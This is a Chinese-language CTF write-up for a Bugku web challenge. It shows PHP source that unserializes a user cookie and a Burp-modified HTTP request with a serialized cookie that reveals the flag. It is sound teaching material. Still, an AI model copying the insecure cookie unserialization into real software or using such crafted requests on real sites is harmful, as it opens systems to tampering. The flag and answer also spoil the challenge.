bugku#点login咋没反应-writeup

点login咋没反应

今天简单给友友们分享一下修改数据包上传的一个题型,请食用。

  • 打开靶场
    在这里插入图片描述

  • 查看源码有admin.css
    在这里插入图片描述

  • 查看/?hint
    在这里插入图片描述

  • 发现admin.css 访问

在这里插入图片描述

  • 发现/* try ?15057 */ 访问

在这里插入图片描述

  • 分析代码
<?php
error_reporting(0);
$KEY='ctf.bugku.com';
include_once("flag.php");
$cookie = $_COOKIE['BUGKU'];

if(isset($_GET['15057'])){										//isset函数检测输入值是否为空,若为空执行elseif
    show_source(__FILE__);
}                                //isset函数检测输入值是否为空,若为空执行elseif


elseif (unserialize($cookie) === "$KEY")		
				//令cookie值反序列化后的值与ctf.bugku.com相同
{   
echo "$flag";			//输出key
								
}
else {
?>
  • 当传入的参数是空的,cookie的值反序列化后等于key,则显示flag,使用在线序列化的网站快速实现
https://www.toolnb.com/dev/runCode/243e11a40a13ca67d0f13d10dadfdd48.html
  • Cookie

在这里插入图片描述

  • 使用burp修改数据包发包
    在这里插入图片描述
GET / HTTP/1.1
Host: 114.67.175.224:11451
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
cookie:s:13:"ctf.bugku.com";
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
  • 根据返回包成功得到flag!

在这里插入图片描述

flag{fd86b33cc7871e86c33b67ff01906bcc}

【文章仅限网络安全爱好者学习参考使用,请勿用于非法途径。】
#网络安全爱好者#doyoubest

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值